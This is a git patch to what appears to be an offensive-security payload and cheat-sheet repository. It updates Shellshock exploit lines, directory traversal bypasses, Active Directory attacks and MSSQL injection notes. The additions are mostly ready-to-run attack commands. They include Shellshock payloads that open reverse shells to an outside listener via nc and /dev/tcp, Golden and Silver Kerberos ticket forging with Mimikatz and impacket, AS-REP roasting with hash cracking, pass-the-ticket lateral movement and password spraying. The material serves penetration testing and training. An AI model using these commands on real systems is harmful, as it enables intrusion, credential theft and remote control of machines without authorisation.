From 8dffb59ac51effed3a964aa5050476bf124af6c8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 18 Aug 2019 22:24:48 +0200 Subject: [PATCH] Pspy + Silver Ticket + MSSQL connect --- CVE Exploits/README.md | 5 +- Directory Traversal/README.md | 9 ++ File Inclusion/README.md | 2 +- .../Active Directory Attack.md | 112 ++++++++++++------ .../Linux - Privilege Escalation.md | 8 ++ .../Windows - Persistence.md | 13 ++ .../Windows - Privilege Escalation.md | 2 + SQL Injection/MSSQL Injection.md | 33 +++++- SQL Injection/README.md | 1 + 9 files changed, 141 insertions(+), 44 deletions(-) diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 41b223c..8563a19 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. -```bash -echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n +```powershell +echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n" +curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" ``` ## CVE-2017-5638 - Apache Struts 2 diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index cedc13c..1420178 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -9,11 +9,13 @@ * [16 bits Unicode encoding](#) * [UTF-8 Unicode encoding](#) * [Bypass "../" replaced by ""](#) + * [Bypass "../" with ";"](#) * [Double URL encoding](#) * [UNC Bypass](#unc-bypass) * [Path Traversal](#path-traversal) * [Interesting Linux files](#) * [Interesting Windows files](#) +* [References](#references) ## Tools @@ -62,6 +64,13 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings ...\.\ ``` +### Bypass "../" with ";" + +```powershell +..;/ +http://domain.tld/page.jsp?include=..;/..;/sensitive.txt +``` + ### Double URL encoding ```powershell diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 255a83d..29fbf59 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -46,7 +46,7 @@ http://example.com/index.php?page=../../../etc/passwd ### Null byte -:warning: In versions of PHP below 5.3 we can terminate with null byte. +:warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 91056a7..0ee7408 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -9,8 +9,8 @@ * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Password in AD User comment](#password-in-ad-user-comment) - * [Golden Tickets](#passtheticket-golden-tickets) - * [Silver Tickets](#passtheticket-silver-tickets) + * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets) + * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) @@ -393,31 +393,33 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### PassTheTicket Golden Tickets +### Pass-the-Ticket Golden Tickets -Forging a TGT require the krbtgt key +Forging a TGT require the krbtgt NTLM hash -Mimikatz version +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used. + +#### Using Mimikatz ```powershell -Get info - Mimikatz +# Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt -Forge a Golden ticket - Mimikatz +# Forge a Golden ticket - Mimikatz kerberos::purge kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt ``` -Meterpreter version +#### Using Meterpreter ```powershell -Get info - Meterpreter(kiwi) +# Get info - Meterpreter(kiwi) dcsync_ntlm krbtgt dcsync krbtgt -Forge a Golden ticket - Meterpreter +# Forge a Golden ticket - Meterpreter load kiwi golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck @@ -426,40 +428,51 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck kerberos_ticket_list ``` -Using a ticket on Linux +#### Using a ticket on Linux ```powershell -Convert the ticket kirbi to ccache with kekeo +# Convert the ticket kirbi to ccache with kekeo misc::convert ccache ticket.kirbi -Alternatively you can use ticketer from Impacket +# Alternatively you can use ticketer from Impacket ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 ./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 - export KRB5CCNAME=/home/user/ticket.ccache cat $KRB5CCNAME - -NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### PassTheTicket Silver Tickets +If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`. + +```powershell +root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi +Converting ccache => kirbi +root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache +Converting kirbi => ccache +``` + +### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) from the KDC ```powershell -Create a ticket for the service -kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +# Create a ticket for the service +mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE -Then use the same steps as a Golden ticket -misc::convert ccache ticket.kirbi -export KRB5CCNAME=/home/user/ticket.ccache -./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +# Examples +mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park + +# Then use the same steps as a Golden ticket +mimikatz $ misc::convert ccache ticket.kirbi + +root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache +root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` ### Kerberoast @@ -483,7 +496,7 @@ $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c1 Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell -.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD +.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt ``` Then crack the ticket with hashcat or john @@ -499,7 +512,7 @@ If a domain user does not have Kerberos preauthentication enabled, an AS-REP can ```powershell C:\>git clone https://github.com/GhostPack/Rubeus#asreproast -C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user +C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast ______ _ (_____ \ | | @@ -527,6 +540,19 @@ v1.3.4 [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... + +C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast +``` + +Using `impacket` to get the hash and `hashcat` to crack it. + +```powershell +# extract hashes +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast +root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast + +# crack AS_REP messages +root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` ### Pass-the-Hash @@ -565,22 +591,30 @@ sekurlsa::pth /user: /domain: /ntlm:.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt +C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd +``` + ### Capturing and cracking NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. @@ -817,26 +851,29 @@ Password spraying refers to the attack method that takes a large number of usern > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. -Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. +#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771). ```powershell root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 +root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt ``` -Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. +#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. ```powershell crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` -Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. +#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. ```powershell python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] ``` -Using [hydra]() and [ncrack]() to target RDP services. +#### Using [hydra]() and [ncrack]() to target RDP services. ```powershell hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 @@ -950,4 +987,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) -* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) \ No newline at end of file +* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 7b14c77..e01d4be 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -213,6 +213,14 @@ cat /etc/cron.allow cat /etc/cron.deny* ``` +You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. + +```powershell +# print both commands and file system events and scan procfs every 1000 ms (=1sec) +./pspy64 -pf -i 1000 +``` + + ## Systemd timers ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 4873b3d..d8fa2cd 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -1,5 +1,18 @@ # Windows - Persistence +## Summary + +* [Userland](#userland) + * [Registry](#registry) + * [Startup](#startup) + * [Scheduled Task](#scheduled-task) +* [Elevated](#elevated) + * [HKLM](#hklm) + * [Services](#services) + * [Scheduled Task](#scheduled-task) +* [References](#references) + + ## Userland ### Registry diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 12f24dc..e093f98 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -424,6 +424,7 @@ Scheduled tasks ```powershell schtasks /query /fo LIST 2>nul | findstr TaskName +schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` @@ -698,6 +699,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases +:warning: Juicy Potato doesn't work in Windows Server 2019. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0061bad..fa30aa6 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -1,5 +1,23 @@ # MSSQL Injection +## Summary + +* [MSSQL comments](#mssql-comments) +* [MSSQL version](#mssql-version) +* [MSSQL database name](#mssql-database-name) +* [MSSQL List databases](#mssql-list-database) +* [MSSQL List columns](#mssql-list-columns) +* [MSSQL List tables](#mssql-list-tables) +* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Union Based](#mssql-union-based) +* [MSSQL Error Based](#mssql-error-based) +* [MSSQL Blind Based](#mssql-blind-based) +* [MSSQL Time Based](#mssql-time-based) +* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Command execution](#mssql-command-execution) +* [MSSQL UNC path](#mssql-unc-path) +* [MSSQL Make user DBA](#mssql-make-user-dba) + ## MSSQL comments ```sql @@ -19,14 +37,14 @@ SELECT @@version SELECT DB_NAME() ``` -## MSSQL List Databases +## MSSQL List databases ```sql SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, … ``` -## MSSQL List Column +## MSSQL List columns ```sql SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only @@ -35,7 +53,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, column_name FROM information_schema.columns ``` -## MSSQL List Tables +## MSSQL List tables ```sql SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views @@ -45,7 +63,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, table_name FROM information_schema.columns ``` -## MSSQL User Password +## MSSQL Extract user/password ```sql MSSQL 2000: @@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` +To interact with the MSSQL instance. + +```powershell +sqsh -S 192.168.1.X -U sa -P superPassword +python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 +``` + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. diff --git a/SQL Injection/README.md b/SQL Injection/README.md index e238323..8099f6d 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -52,6 +52,7 @@ Simple characters %3B ) Wildcard (*) +' # required for XML content ``` Multiple encoding